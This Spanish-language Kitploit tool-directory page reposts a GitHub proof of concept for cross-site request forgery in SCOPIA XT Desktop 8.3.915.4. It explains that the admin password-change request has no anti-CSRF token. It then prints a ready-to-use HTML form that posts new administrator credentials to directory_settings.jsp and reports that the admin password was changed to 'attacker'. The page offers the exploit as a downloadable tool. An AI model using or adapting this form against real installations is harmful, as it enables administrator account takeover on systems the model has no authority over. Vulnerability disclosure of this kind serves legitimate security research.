Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4 | Kitploit
Herramientas/GitHubGitHub/v1n1v131r4/exploit-csrf-on-scopia-xt-desktop-version-8.3.915.4
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubv1n1v131r4/exploit-csrf-on-scopia-xt-desktop-version-8.3.915.4

Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
1hace 5 añosAún no revisado

Exploit CSRF en SCOPIA XT Desktop versión 8.3.915.4

Este PoC describirá cómo explotar Cross-Site Request Forgery (CSRF) en SCOPIA XT Desktop versión 8.3.915.4


Acerca de SCOPIA

sitio web: https://support.avaya.com/products/P1421/scopia-desktop/8.2.1


Acerca de Cross-Site Request Forgery (CSRF)

Cross-site request forgery, también conocido como ataque de un solo clic o session riding y abreviado como CSRF o XSRF, es un tipo de explotación maliciosa de un sitio web donde se transmiten comandos no autorizados desde un usuario en el que la aplicación web confía.


Prueba de concepto: cambiar la contraseña de administrador

1

En la página "Directory and Authentication", el administrador puede cambiar su contraseña.

2

Al capturar la petición con Burp Suite pude ver que no se implementaba un token anti-CSRF y que el único mecanismo de seguridad es la cookie de sesión.

6

Creé este archivo HTML que sirvió como PoC para explotar la vulnerabilidad presentada.

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
	<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
		<input type="text" name="JSESSIONID" value="">
		<input type="text" name="newadminusername" value="">
		<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
		<input type="text" name="newenablext1000meetingpin" value="false">
		<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
		<input type="text" name="checkstatus" value="true">
		<input type="submit" value="Send">
	</form>
</body>
</html>

Al ejecutarlo en el navegador que tiene una cookie válida para el entorno de administración de SCOPIA XT Desktop, fue posible cambiar la contraseña del usuario admin a "attacker":

4

5

Descargar herramienta